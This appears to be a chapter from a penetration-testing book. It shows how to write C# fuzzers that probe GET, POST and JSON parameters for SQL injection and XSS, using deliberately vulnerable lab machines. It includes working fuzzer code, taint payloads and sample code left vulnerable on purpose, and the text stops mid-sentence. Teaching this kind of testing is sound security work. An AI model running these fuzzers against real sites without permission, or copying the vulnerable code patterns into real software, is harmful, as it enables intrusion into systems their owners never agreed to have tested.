
In this chapter, you’ll learn how to write a short and sweet cross-site scripting (XSS) and SQL injection fuzzer for URLs that take HTTP parameters in GET and POST requests. A fuzzer is software that attempts to find errors in other software, such as that on servers, by sending bad or malformed data. The two general types of fuzzers are mutational and generational. A mutational fuzzer attempts to taint the data in a known-good input with bad data, without regard for the protocol or the structure of the data. In contrast, a generational fuzzer takes into account the nuances of the server’s communication protocol and uses these nuances to generate technically valid data that is sent to the server. With both types of fuzzers, the goal is to get the server to return an error to the fuzzer.

We’ll write a mutational fuzzer that you can use when you have a known-good input in the form of a URL or HTTP request. (We’ll write a generational fuzzer in Chapter 3.) Once you’re able to use a fuzzer to find XSS and SQL injection vulnerabilities, you’ll learn how to exploit the SQL injection vulnerabilities to retrieve usernames and password hashes from the database.

In order to find and exploit XSS and SQL injection vulnerabilities, we’ll use the core HTTP libraries to build HTTP requests programmatically in C#. We’ll first write a simple fuzzer that parses a URL and begins fuzzing the HTTP parameters using GET and POST requests. Next, we’ll develop full exploits for the SQL injection vulnerabilities that use carefully crafted HTTP requests to extract user information from the database.

We’ll test our tools in this chapter against a small Linux distribution called BadStore (available at the VulnHub website, https://www.vulnhub.com/). BadStore is designed with vulnerabilities like SQL injections and XSS attacks (among many others). After downloading the BadStore ISO from VulnHub, we’ll use the free VirtualBox virtualization software to create a virtual machine in which to boot the BadStore ISO so that we can attack without risk of compromising our own host system.

Setting Up the Virtual Machine

To install VirtualBox on Linux, Windows, or OS X, download the VirtualBox software from https://www.virtualbox.org/. (Installation should be simple; just follow the latest directions on the site when you download the software.) Virtual machines (VMs) allow us to emulate a computer system using a physical computer. We can use virtual machines to easily create and manage vulnerable software systems (such as the ones we will use throughout the book).

Adding a Host-Only Virtual Network

You may need to create a host-only virtual network for the VM before actually setting it up. A host-only network allows communication only between VMs and the host system. Here are the steps to follow:

  1. Click File Preferences to open the VirtualBox – Preferences dialog. On OS X, select the VirtualBox Preferences.

  2. Click the Network section on the left. You should see two tabs: NAT Networks and Host-only Networks. On OS X, click the Network tab at the top of the Settings dialog.

  3. Click the Host-only Networks tab and then the Add host-only network (Ins) button on the right. This button is an icon of a network card overlaid with a plus sign. This should create a network named vboxnet0.

  4. Click the Edit host-only network (Space) button on the right. This button is an icon of a screwdriver.

  5. From the dialog that opens, click the DHCP Server tab. Check the Enable Server box. In the Server Address field, enter the IP address In the Server Mask field, enter In the Lower Address Bound field, enter In the Upper Address Bound field, enter

  6. Click OK to save changes to the host-only network.

  7. Click OK again to close the Settings dialog.

Creating the Virtual Machine

Once VirtualBox is installed and configured with a host-only network, here’s how to set up the VM:

  1. Click the New icon in the top-left corner, as shown in Figure 2-1.

  2. When presented with a dialog to choose the name of the operating system and type, select the Other Linux (32-bit) drop-down option.

  3. Click Continue, and you should be presented with a screen to give the virtual machine some RAM. Set the amount of RAM to 512 MB and click Continue. (Fuzzing and exploiting can make the web server use a lot of RAM on the virtual machine.)

  4. When asked to create a new virtual hard drive, choose Do not add a virtual hard drive and click Create. (We’ll run BadStore from the ISO image.) You should now see the VM in the left pane of the VirtualBox Manager window, as shown in Figure 2-1.


    Figure 2-1: VirtualBox with a BadStore VM

Booting the Virtual Machine from the BadStore ISO

Once the VM has been created, set it to boot from the BadStore ISO by following these steps:

  1. Right-click the VM in the left pane of the VirtualBox Manager and click Settings. A dialog should appear showing the current settings for the network card, CD-ROM, and other miscellaneous configuration items.

  2. Select the Network tab in the Settings dialog. You should see upwards of seven settings for the network card, including NAT (network address translation), host-only, and bridged. Choose host-only networking to allocate an IP address that is accessible only from the host machine but not from the rest of the Internet.

  3. You need to set the type of network card in the Advanced drop-down to an older chipset, because BadStore is based on an old Linux kernel and some newer chipsets aren’t supported. Choose PCnet-FAST III.

Now set the CD-ROM to boot from the ISO on the hard drive by following these steps:

  1. Select the Storage tab in the Settings dialog. Click the CD icon to show a menu with the option Choose a virtual CD/DVD disk file.

  2. Click the Choose a virtual CD/DVD disk file option to find the BadStore ISO that you saved to your filesystem and set it as the bootable media. The virtual machine should now be ready to boot.

  3. Save the settings by clicking OK in the bottom-right corner of the Settings tab. Then click the Start button in the top-left corner of the VirtualBox Manager, next to the Settings gear button, to boot the virtual machine.

  4. Once the machine has booted, you should see a message saying, “Please press Enter to activate this console.” Press enter and type ifconfig to view the IP configuration that should have been acquired.

  5. Once you have your virtual machine’s IP address, enter it in your web browser, and you should see a screen like the one shown in Figure 2-2.


    Figure 2-2: The main page of the BadStore web application

SQL Injections

In today’s rich web applications, programmers need to be able to store and query information behind the scenes in order to provide high-quality, robust user experiences. This is generally accomplished using a Structured Query Language (SQL; pronounced sequel) database such as MySQL, PostgreSQL, or Microsoft SQL Server.

SQL allows a programmer to interact with a database programmatically using SQL statements—code that tells the database how to create, read, update, or delete data based on some supplied information or criteria. For instance, a SELECT statement asking the database for the number of users in a hosted database might look like Listing 2-1.


Listing 2-1: Sample SQL SELECT statement

Sometimes programmers need SQL statements to be dynamic (that is, to change based on a user’s interaction with a web application). For example, a programmer may need to select information from a database based on a certain user’s ID or username.

However, when a programmer builds a SQL statement using data or values supplied by a user from an untrusted client such as a web browser, a SQL injection vulnerability may be introduced if the values used to build and execute SQL statements are not properly sanitized. For example, the C# SOAP method shown in Listing 2-2 might be used to insert a user into a database hosted on a web server. (SOAP, or Simple Object Access Protocol, is a web technology powered by XML that’s used to create APIs on web applications quickly. It’s popular in enterprise languages such as C# and Java.)

public string AddUser(string username, string password)
  NpgsqlConnection conn = new NpgsqlConnection(_connstr);

  string sql = "insert into users values('{0}', '{1}');";
 sql = String.Format(sql, username, password);
  NpgsqlCommand command = new NpgsqlCommand(sql, conn);

  return "Excellent!";

Listing 2-2: A C# SOAP method vulnerable to a SQL injection

In this case, the programmer hasn’t sanitized the username and password before creating and executing a SQL string. As a result, an attacker could craft a username or password string to make the database run carefully crafted SQL code designed to give them remote command execution and full control of the database.

If you were to pass in an apostrophe with one of the parameters (say user'name instead of username), the ExecuteNonQuery() method would try to run an invalid SQL query (shown in Listing 2-3). Then the method would throw an exception, which would be shown in the HTTP response for the attacker to see.

insert into users values('user'name', 'password');

Listing 2-3: This SQL query is invalid due to unsanitized user-supplied data.

Many software libraries that enable database access allow a programmer to safely use values supplied by an untrusted client like a web browser with parameterized queries. These libraries automatically sanitize any untrusted values passed to a SQL query by escaping characters such as apostrophes, parentheses, and other special characters used in the SQL syntax. Parameterized queries and other types of Object Relational Mapping (ORM) libraries like NHibernate help to prevent these SQL injection issues.

User-supplied values like these tend to be used in WHERE clauses within SQL queries, as in Listing 2-4.

SELECT * FROM users WHERE user_id = '1'

Listing 2-4: Sample SQL SELECT statement selecting a row for a specific user_id

As shown in Listing 2-3, throwing a single apostrophe into an HTTP parameter that is not properly sanitized before being used to build a dynamic SQL query could cause an error to be thrown by the web application (such as an HTTP return code of 500) because an apostrophe in SQL denotes the beginning or end of a string. The single apostrophe invalidates the statement by ending a string prematurely or by beginning a string without ending it. By parsing the HTTP response to such a request, we can fuzz these web applications and search for user-supplied HTTP parameters that lead to SQL errors in the response when the parameters are tampered with.

Cross-Site Scripting

Like SQL injection, cross-site scripting (XSS) attacks exploit vulnerabilities in code that crop up when programmers build HTML to be rendered in the web browser using data passed from the web browser to the server. Sometimes, the data supplied by an untrusted client, such as a web browser, to the server can contain HTML code such as JavaScript, allowing an attacker to potentially take over a website by stealing cookies or redirecting users to a malicious website with raw, unsanitized HTML.

For example, a blog that allows for comments might send an HTTP request with the data in a comment form to a site’s server. If an attacker were to create a malicious comment with embedded HTML or JavaScript, and the blog software trusted and therefore did not sanitize the data from the web browser submitting the “comment,” the attacker could use their loaded attack comment to deface the website with their own HTML code or redirect any of the blog’s visitors to the attacker’s own website. The attacker could then potentially install malware on the visitors’ machines.

Generally speaking, a quick way to detect code in a website that may be vulnerable to XSS attacks is to make a request to the site with a tainted parameter. If the tainted data appears in the response without alteration, you may have found a vector for XSS. For instance, suppose you pass <xss> in a parameter within an HTTP request, as in Listing 2-5.

GET /index.php?name=Brandon<xss> HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Listing 2-5: Sample GET request to a PHP script with a query string parameter

The server responds with something like the HTTP response in Listing 2-6.

HTTP/1.1 200 OK
Date: Sun, 19 Apr 2015 21:28:02 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.7
Content-Length: 32
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

Welcome Brandon&lt;xss&gt;<br />

Listing 2-6: Sample response from the PHP script sanitizing the name query string parameter

Essentially, if the code <xss> is replaced with a version that has some HTML entities, you know that the site is filtering input using a PHP function such as htmlspecialchars() or a similar method. However, if the site simply returns <xss> in the response, you know that it’s not performing any filtering or sanitization, as with the HTTP name parameter in the code shown in Listing 2-7.

  $name = $_GET['name'];
echo "Welcome $name<br>";

Listing 2-7: PHP code vulnerable to XSS

As with the code vulnerable to a SQL injection in Listing 2-1, the programmer is not sanitizing or replacing any potentially bad characters in the parameter before rendering the HTML to the screen . By passing a specially crafted name parameter to the web application, we can render HTML to the screen, execute JavaScript, and even run Java applets that attempt to take over the computer. For example, we could send a specially crafted URL such as the one in Listing 2-8.


Listing 2-8: A URL with a query string parameter that would pop up a JavaScript alert if the parameter were vulnerable to XSS

The URL in Listing 2-8 could cause a JavaScript pop-up to appear in the browser with the number 1 if the PHP script were using the name parameter to build some HTML code that would eventually be rendered in the web browser.

Fuzzing GET Requests with a Mutational Fuzzer

Now that you know the basics of SQL injection and XSS vulnerabilities, let’s implement a quick fuzzer to find potential SQL injection or XSS vulnerabilities in query string parameters. Query string parameters are the parameters in a URL after the ? sign, in key = value format. We’ll focus on the HTTP parameters in a GET request, but first we’ll break up a URL so we can loop through any HTTP query string parameters, as shown in Listing 2-9.

public static void Main(string[] args)
string url = args[0];
 int index = url.IndexOf("?");
 string[] parms = url.Remove(0, index+1).Split('&');
 foreach (string parm in parms)

Listing 2-9: Small Main() method breaking apart the query string parameters in a given URL

In Listing 2-9, we take the first argument (args[0]) passed to the main fuzzing application and assume it is a URL with some fuzzable HTTP parameters in the query string. In order to turn the parameters into something we can iterate over, we remove any characters up to and including the question mark (?) in the URL and use IndexOf("?") to determine the index of the first occurrence of a question mark, which denotes that the URL has ended and that the query string parameters follow; these are the parameters that we can parse.

Calling Remove(0, index+1) returns a string that contains only our URL parameters. This string is then split by the '&' character , which marks the beginning of a new parameter. Finally, we use the foreach keyword, loop over all the strings in the parms array, and print each parameter and its value. We’ve now isolated the query string parameters and their values from the URL so that we can begin to alter the values while making HTTP requests in order to induce errors from the web application.

Tainting the Parameters and Testing for Vulnerabilities

Now that we have separated any URL parameters that might be vulnerable, the next step is to taint each with a piece of data that the server will sanitize properly if it is not vulnerable to either XSS or SQL injection. In the case of XSS, our tainted data will have <xss> added, and the data to test for SQL injection will have a single apostrophe.

We can create two new URLs to test the target by replacing the known-good parameter values in the URLs with the tainted data for XSS and SQL injection vulnerabilities, as shown in Listing 2-10.

foreach (string parm in parms)
string xssUrl = url.Replace(parm, parm + "fd<xss>sa");
string sqlUrl = url.Replace(parm, parm + "fd'sa");


Listing 2-10: Modified foreach loop replacing parameters with tainted data

In order to test for vulnerabilities, we need to ensure that we’re creating URLs that our target site will understand. To do so, we first replace the old parameter in the URL with a tainted one, and then we print the new URLs we’ll be requesting. When printed to the screen, each parameter in the URL should have one line that includes the XSS-tainted parameter and one line containing the parameter with a single apostrophe , as shown in Listing 2-11.<xss>sa&action=search'sa&action=search

Listing 2-11: URLs printed with tainted HTTP parameters

Building the HTTP Requests

Next, we programmatically build the HTTP requests using the HttpWebRequest class, and then we make the HTTP requests with the tainted HTTP parameters to see if any errors are returned (see Listing 2-12).

foreach (string parm in parms)
  string xssUrl = url.Replace(parm, parm + "fd<xss>sa");
  string sqlUrl = url.Replace(parm, parm + "fd'sa");
  HttpWebRequest request = (HttpWebRequest)WebRequest.Create(sqlUrl);
  request.Method = "GET";

  string sqlresp = string.Empty;
  using (StreamReader rdr = new
    sqlresp = rdr.ReadToEnd();

  request = (HttpWebRequest)WebRequest.Create(xssUrl);
  request.Method = "GET";
  string xssresp = string.Empty;

  using (StreamReader rdr = new
    xssresp = rdr.ReadToEnd();

  if (xssresp.Contains("<xss>"))
    Console.WriteLine("Possible XSS point found in parameter: " + parm);

  if (sqlresp.Contains("error in your SQL syntax"))
    Console.WriteLine("SQL injection point found in parameter: " + parm);


Listing 2-12: Full foreach loop testing the given URL for XSS and SQL injection

In Listing 2-12, we use the static Create() method from the WebRequest class in order to make an HTTP request, passing the URL in the sqlUrl variable tainted with a single apostrophe as an argument, and we cast the resulting instantiated WebRequest returned to an HttpWebRequest. (Static methods are available without instantiating the parent class.) The static Create() method uses a factory pattern to create new objects based on the URL passed, which is why we need to cast the object returned to an HttpWebRequest object. If we passed a URL prefaced with ftp:// or file://, for instance, then the type of object returned by the Create() method would be a different class (FtpWebRequest or FileWebRequest, respectively). We then set the Method property of the HttpWebRequest to GET (so we make a GET request) and save the response to the request in the resp string using the StreamReader class and the ReadToEnd() method . If the response either contains the unsanitized XSS payload or throws an error regarding SQL syntax, we know we may have found a vulnerability.


Notice that we’re using the using keyword in a new way here. Prior to this, we used using to import classes within a namespace (such as System.Net) into the fuzzer. Essentially, instantiated objects (objects created with the new keyword) can be used in the context of a using block in this way when the class implements the IDisposable interface (which requires a class to implement a Dispose() method). When the scope of the using block ends, the Dispose() method on the object is called automatically. This is a very useful way to manage the scope of a resource that can lead to resource leaks, such as network resources or file descriptors.

Testing the Fuzzing Code

Let’s test our code with the search field on the BadStore front page. After opening the BadStore application in your web browser, click the Home menu item on the left side of the page and then perform a quick search from the search box in the upper-left corner. You should see a URL in your browser similar to the one shown in Listing 2-13.

Listing 2-13: Sample URL to the BadStore search page

Pass the URL in Listing 2-13 (replacing the IP address with the IP address of the BadStore instance on your network) to the program as an argument on the command line, as shown in Listing 2-14, and the fuzzing should begin.

$ ./fuzzer.exe ""
SQL injection point found in parameter: searchquery=test
Possible XSS point found in parameter: searchquery=test

Listing 2-14: Running the XSS and SQL injection fuzzer

Running our fuzzer should find both a SQL injection and XSS vulnerability in BadStore, with output similar to that of Listing 2-14.

Fuzzing POST Requests

In this section, we’ll use BadStore to fuzz the parameters of a POST request (a request used to submit data to a web resource for processing) saved to the local hard drive. We’ll capture a POST request using Burp Suite—an easy-to-use HTTP proxy built for security researchers and pen testers that sits between your browser and the HTTP server so that you can see the data sent back and forth.

Download and install Burp Suite now from http://www.portswigger.net/. (Burp Suite is a Java archive or JAR file that can be saved to a thumb drive or other portable media.) Once Burp Suite is downloaded, start it using Java with the commands shown in Listing 2-15.

$ cd ~/Downloads/
$ java -jar burpsuite*.jar

Listing 2-15: Running Burp Suite from the command line

Once started, the Burp Suite proxy should be listening on port 8080. Set Firefox traffic to use the Burp Suite proxy as follows:

  1. From within Firefox, choose Edit Preferences. The Advanced dialog should appear.

  2. Choose the Network tab, as shown in Figure 2-3.


    Figure 2-3: The Network tab within Firefox preferences

  3. Click Settings... to open the Connection Settings dialog, as shown in Figure 2-4.


    Figure 2-4: The Connection Settings dialog

  4. Select Manual proxy configuration and enter into the HTTP Proxy field and 8080 into the Port field. Click OK and then close the Connection Settings dialog.

Now all requests sent through Firefox should be directed through Burp Suite first. (To test this, go to http://google.com/; you should see the request in Burp Suite’s request pane, as shown in Figure 2-5.)


Figure 2-5: Burp Suite actively capturing a request for google.com from Firefox

Clicking the Forward button within Burp Suite should forward the request (to Google in this case) and return the response to Firefox.

Writing a POST Request Fuzzer

We’ll write and test our POST request fuzzer against BadStore’s “What’s New” page (see Figure 2-6). Navigate to this page in Firefox and click the What’s New menu item on the left.


Figure 2-6: The “What’s New” items page of the BadStore web application

A button at the bottom of the page is used to add checked items to your shopping cart. With Burp Suite sitting between your browser and the BadStore server, select a few items using the checkboxes on the right side of the page and then click Submit to initiate the HTTP request to add the items to your cart. Capturing the submit request within Burp Suite should yield a request like Listing 2-16.

POST /cgi-bin/badstore.cgi?action=cartadd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 63


Listing 2-16: HTTP POST request from Burp Suite

The request shown in Listing 2-16 is a typical POST request with URL-encoded parameters (a set of special characters, some of which are whitespace such as spaces and newlines). Note that this request uses plus signs (+) instead of spaces. Save this request to a text file. We’ll use it later to systematically fuzz the parameters being sent in the HTTP POST request.


The parameters in an HTTP POST request are included in the last line of the request, which defines the data being posted in key/value form. (Some POST requests post multipart forms or other exotic types of data, but the general principle remains the same.)

Notice in this request that we are adding the items with an ID of 1000 and 1003 to the cart. Now look at the Firefox window, and you should notice that these numbers correspond to the ItemNum column. We are posting a parameter along with these IDs, essentially telling the application what to do with the data we’re sending (namely, add the items to the cart). As you can see, the only parameters that might be susceptible to SQL injection are the two cartitem parameters, because these are the parameters that the server will interpret.

The Fuzzing Begins

Before we start fuzzing our POST request parameters, we need to set up a little bit of data, as shown in Listing 2-17.

public static void Main(string[] args)
  string[] requestLines = File.ReadAllLines(args[0]);
 string[] parms = requestLines[requestLines.Length - 1].Split('&');
string host = string.Empty;
  StringBuilder requestBuilder = new StringBuilder();

  foreach (string ln in requestLines)
    if (ln.StartsWith("Host:"))
      host = ln.Split(' ')[1].Replace(" ", string.Empty);
    requestBuilder.Append(ln + " ");

  string request = requestBuilder.ToString() + " ";

Listing 2-17: The Main() method reading a POST request and storing the Host header

We read the request from the file using File.ReadAllLines() and pass the first argument to the fuzzing application as the argument to ReadAllLines(). We use ReadAllLines() instead of ReadAllText() because we need to split the request in order to get information out of it (namely, the Host header) before fuzzing. After reading the request line by line into a string array and grabbing the parameters from the last line of the file , we declare two variables. The host variable stores the IP address of the host we are sending the request to. Declared below is a System.Text.StringBuilder , which we’ll use to build the full request as a single string.


We use a StringBuilder because it’s more performant than using the += operator with a basic string type (each time you call the += operator, you create a new string object in memory). On a small file like this, you won’t notice a difference, but when you’re dealing with a lot of strings in memory, you will. Using a StringBuilder creates only one object in memory, resulting in much less memory overhead.

Now we loop through each line in the request that was previously read in. We check whether the line begins with "Host:" and, if so, assign the second half of the host string to the host variable. (This should be an IP address.) We then call Replace() on the string to remove the trailing , which could be left by some versions of Mono, since an IP address does not have in it. Finally, we append the line with to the StringBuilder. Having built the full request, we assign it to a new string variable called request. (For HTTP, your request must end with ; otherwise, the server response will hang.)

Fuzzing Parameters

Now that we have the full request to send, we need to loop through and attempt to fuzz the parameters for SQL injections. Within this loop, we’ll use the classes System.Net.Sockets.Socket and System.Net.IPEndPoint. Because we have the full HTTP request as a string, we can use a basic socket to communicate with the server instead of relying on the HTTP libraries to create the request for us. Now we have all that we need to fuzz the server, as shown in Listing 2-18.

   IPEndPoint rhost = new IPEndPoint(IPAddress.Parse(host), 80);
   foreach (string parm in parms)
     using (Socket sock = new Socket(AddressFamily.InterNetwork,
       SocketType.Stream, ProtocolType.Tcp))
       sock.Connect (rhost);

       string val = parm.Split('=')[1];
       string req = request.Replace("=" + val, "=" + val + "'");

       byte[] reqBytes = Encoding.ASCII.GetBytes(req);

       byte[] buf = new byte[sock.ReceiveBufferSize];

       string response = Encoding.ASCII.GetString(buf);
       if (response.Contains("error in your SQL syntax"))
         Console.WriteLine("Parameter " + parm + " seems vulnerable");
         Console.Write(" to SQL injection with value: " + val + "'");

Listing 2-18: Additional code added to Main() method fuzzing the POST parameters

In Listing 2-18, we create a new IPEndPoint object by passing a new IPAddress object returned by IPAddress.Parse(host) and the port we will be connecting to on the IP address (80). Now we can loop over the parameters grabbed from the requestLines variable previously. For each iteration, we need to create a new Socket connection to the server, and we use the AddressFamily.InterNetwork to tell the socket it is IPv4 (version 4 of the Internet Protocol, as opposed to IPv6) and use SocketType.Stream to tell the socket that this is a streaming socket (stateful, two-way, and reliable). We also use ProtocolType.Tcp to tell the socket that the protocol to be used is TCP.

Once this object is instantiated, we can call Connect() on it by passing our IPEndPoint object rhost as an argument. After we have connected to the remote host on port 80, we can begin fuzzing the parameter. We split the parameter from the foreach loop on the equal sign (=) character and extract the value of that parameter using the value in the second index of the array (resulting from the method call). Then we call Replace() on the request string to replace the original value with a tainted one. For example, if our value is 'foo' within the parameters string 'blah=foo&blergh=bar', we would replace foo with foo' (note the apostrophe appended to the end of foo).

Next, we get a byte array representing the string using Encoding.ASCII.GetBytes() , and we send it over the socket to the server port specified in the IPEndPoint constructor. This is equivalent to making a request from your web browser to the URL in the address bar.

After sending the request, we create a byte array equal to the size of the response we will receive, and we fill it with the response from the server with Receive() . We use Encoding.ASCII.GetString() to get the string that the byte array represents, and we can then parse the response from the server. We check the response from the server by checking whether the SQL error message we expect is in the response data.

Our fuzzer should output any parameters that result in SQL errors, as shown in Listing 2-19.

$ mono POST_fuzzer.exe /tmp/request
Parameter cartitem=1000 seems vulnerable to SQL injection with value: 1000'
Parameter cartitem=1003 seems vulnerable to SQL injection with value: 1003'

Listing 2-19: Output from running the POST fuzzer on the request

As we can see in the fuzzer output, the cartitem HTTP parameter seems vulnerable to a SQL injection. When we insert an apostrophe into the current value of the HTTP parameter, we get back a SQL error in the HTTP response, which makes this highly likely to be vulnerable to a SQL injection attacks.

Fuzzing JSON

As a pentester or security engineer, you will likely run into web services that accept data serialized as JavaScript Object Notation (JSON) in some form as input. In order to help you learn to fuzz JSON HTTP requests, I’ve written a small web application called CsharpVulnJson that accepts JSON and uses the information within to persist and search user-related data. A small virtual appliance has been created so that the web service works out of the box; it is available on the VulnHub website (http://www.vulnhub.com/).

Setting Up the Vulnerable Appliance

CsharpVulnJson ships as an OVA file, a completely self-contained virtual machine archive that you can simply import into your choice of virtualization suite. In most cases, double-clicking the OVA file should bring up your virtualization software to automatically import the appliance.

Capturing a Vulnerable JSON Request

Once CsharpVulnJson is running, point Firefox to port 80 on the virtual machine, and you should see a user management interface like the one shown in Figure 2-7. We will focus on creating users with the Create User button and the HTTP request this button makes when creating a user.

Assuming Firefox is still set up to pass through Burp Suite as an HTTP proxy, fill in the Create a user fields and click Create User to yield an HTTP request with the user information inside a JSON hash in Burp Suite’s request pane, as in Listing 2-20.


Figure 2-7: The CsharpVulnJson web application open in Firefox

POST /Vulnerable.ashx HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 190
Cookie: ASP.NET_SessionId=5D14CBC0D339F3F054674D8B
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"username":"whatthebobby","password":"propane1","age":42,"line1":"123 Main St",

Listing 2-20: Create User request with JSON containing user information to save to the database

Now right-click the request pane and select Copy to File. When asked where to save the HTTP request on your computer, make your choice and note where the request was saved, because you’ll need to pass the path to the fuzzer.

Creating the JSON Fuzzer

In order to fuzz this HTTP request, we need to separate the JSON from the rest of the request. We then need to iterate over each key/value pair in the JSON and alter the value to try to induce any SQL errors from the web server.

Reading the Request File

To create the JSON HTTP request fuzzer, we start with a known-good HTTP request (the Create User request). Using the previously saved HTTP request, we can read in the request and begin the fuzzing process, as shown in Listing 2-21.

public static void Main(string[] args)
  string url = args[0];
  string requestFile = args[1];
  string[] request = null;

  using (StreamReader rdr = new StreamReader(File.OpenRead(requestFile)))
    request = rdr.ReadToEnd().Split(' ');

  string json = request[request.Length - 1];
  JObject obj = JObject.Parse(json);

  Console.WriteLine("Fuzzing POST requests to URL " + url);
 IterateAndFuzz(url, obj);

Listing 2-21: The Main method, which kicks off fuzzing the JSON parameter

The first thing we do is store the first and second arguments passed to the fuzzer in two variables (url and requestFile, respectively). We also declare a string array that will be assigned the data in our HTTP request after reading the request from the filesystem.

Within the context of a using statement, we open our request file for reading using File.OpenRead() and pass the file stream returned to the StreamReader constructor . With the new StreamReader class instantiated, we can read all the data in the file with the ReadToEnd() method . We also split the data in the request file using the Split() method , passing a newline character to the method as the character to split the request up. The HTTP protocol dictates that newlines (carriage returns and line feeds, specifically) be used to separate the headers from the data being sent in the request. The string array returned by Split() is assigned to the request variable we declared earlier.

Having read and split the request file, we can grab the JSON data we need to fuzz and begin iterating through the JSON key/value pairs to find SQL injection vectors. The JSON we want is the last line of the HTTP request, which is the last element in the request array. Because 0 is the first element in an array, we subtract 1 from the request array length, use the resulting integer to grab the last element in the request array, and assign the value to the string json .

Once we have the JSON separated from the HTTP request, we can parse the json string and create a JObject that we can programmatically iterate on using JObject.Parse() . The JObject class is available in the Json.NET library, freely available via the NuGet package manager or at http://www.newtonsoft.com/json/. We will use this library throughout the book.

After creating the new JObject, we print a status line to inform the user we are fuzzing POST requests to the given URL. Finally, we pass the JObject and the URL to make HTTP POST requests to the IterateAndFuzz() method to process the JSON and fuzz the web application.

Iterating Over the JSON Keys and Values

Now we can start iterating over each JSON key/value pair and set each pair up to test for a possible SQL injection vector. Listing 2-22 shows how to accomplish this using the IterateAndFuzz() method.

private static void IterateAndFuzz(string url, JObject obj)
  foreach (var pair in (JObject)obj.DeepClone())
    if (pair.Value.Type == JTokenType.String || pair.Value.Type == JTokenType.Integer)
      Console.WriteLine("Fuzzing key: " + pair.Key);

      if (pair.Value.Type == JTokenType.Integer)
      Console.WriteLine("Converting int type to string to fuzz");

      JToken oldVal = pair.Value;
      obj[pair.Key] = pair.Value.ToString() + "'";

      if (Fuzz(url, obj.Root))
        Console.WriteLine("SQL injection vector: " + pair.Key);
        Console.WriteLine (pair.Key + " does not seem vulnerable.");

     obj[pair.Key] = oldVal;

Listing 2-22: The IterateAndFuzz() method, which determines which key/value pairs in the JSON to fuzz

The IterateAndFuzz() method starts by looping over the key/value pairs in the JObject with a foreach loop. Because we will be altering the values within the JSON by inserting apostrophes into them, we call DeepClone() so that we get a separate object that is identical to the first. This allows us to iterate over one copy of the JSON key/value pairs while altering another. (We need to make a copy because while in a foreach loop, you can’t alter the object you are iterating over.)

Within the foreach loop, we test whether the value in the current key/value pair is a JTokenType.String or JTokenType.Integer and continue fuzzing that value if the value is either the string or integer type. After printing a message to alert the user as to which key we are fuzzing, we test whether the value is an integer in order to let the user know that we are converting the value from an integer to a string.


Because integers in JSON have no quotes and must be a whole number or float, inserting a value with an apostrophe would cause a parsing exception. Many weakly typed web applications built with Ruby on Rails or Python will not care whether the JSON value changes type, but strongly typed web applications built with Java or C# might not behave as expected. The CsharpVulnJson web application does not care whether the type is changed on purpose.

Next, we store the old value in the oldVal variable so that we can replace it once we have fuzzed the current key/value pair. After storing the old value, we reassign the current value with the original value, but with an apostrophe tacked on the end of the value so that if it is placed in a SQL query, it should cause a parsing exception.

To determine whether the altered value will cause an error in the web application, we pass the altered JSON and the URL to send it to the Fuzz() method (discussed next), which returns a Boolean value that tells us whether the JSON value could be vulnerable to SQL injection. If Fuzz() returns true, we inform the user that the value may be vulnerable to SQL injection. If Fuzz() returns false, we tell the user that the key does not seem vulnerable.

Once we have determined whether a value is vulnerable to SQL injection, we replace the altered JSON value with the original value and go on to the next key/value pair.

Fuzzing with an HTTP Request

Finally, we need to make the actual HTTP requests with the tainted JSON values and read the response back from the server in order to determine whether the value might be injectable. Listing 2-23 shows how the Fuzz() method creates an HTTP request and tests the response for specific strings to determine if the JSON value is susceptible to a SQL injection vulnerability.

private static bool Fuzz(string url, JToken obj)
  byte[] data = System.Text.Encoding.ASCII.GetBytes(obj.ToString());

  HttpWebRequest req = (HttpWebRequest)WebRequest.Create(url);
  req.Method = "POST";
  req.ContentLength = data.Length;
  req.ContentType = "application/javascript";
  using (Stream stream = req.GetRequestStream())
    stream.Write(data, 0, data.Length);

  catch (WebException e)
    string resp = string.Empty;
    using (StreamReader r = new StreamReader(e.Response.GetResponseStream()))
      resp = r.ReadToEnd();

    return (resp.Contains("syntax error") || resp.Contains("unterminated"));

  return false;

Listing 2-23: The Fuzz() method, which does the actual communication with the server

Because we need to send the whole JSON string as bytes, we pass the string version of our JObject returned by ToString() to the GetBytes() method, which returns a byte array representing the JSON string. We also build the initial HTTP request to be made by calling the static Create() method from the WebRequest class to create a new WebRequest, casting the resulting object to an HttpWebRequest class. Next, we assign the HTTP method, the content length, and the content type of the request. We assign the Method property a value of POST because the default is GET, and we assign the length of our byte array that we will be sending to the ContentLength property. Finally, we assign application/javascript to the ContentType to ensure the web server knows that the data it is receiving should be well-formed JSON.

Now we write our JSON data to the request stream. We call the GetRequestStream() method and assign the stream returned to a variable in the context of a using statement so that our stream is disposed of properly after use. We then call the stream’s Write() method , which takes three arguments: the byte array containing our JSON data, the index of the array we want to begin writing from, and the number of bytes we want to write. (Because we want to write all of them, we pass in the entire length of the data array.)

To get the response back from the server, we create a try block so that we can catch any exceptions and retrieve their responses. We call GetResponse() within the try block to attempt to retrieve a response from the server, but we only care about responses with HTTP return codes of 500 or higher, which would cause GetResponse() to throw an exception.

In order to catch these responses, we follow the try block with a catch block in which we call GetResponseStream() and create a new StreamReader from the stream returned. Using the stream’s ReadToEnd() method , we store the server’s response in the string variable resp (declared before the try block started).

To determine whether the value sent may have caused a SQL error, we test the response for one of two known strings that appear in SQL errors. The first string, "syntax error" , is a general string that is present in the MySQL error, as shown in Listing 2-24.

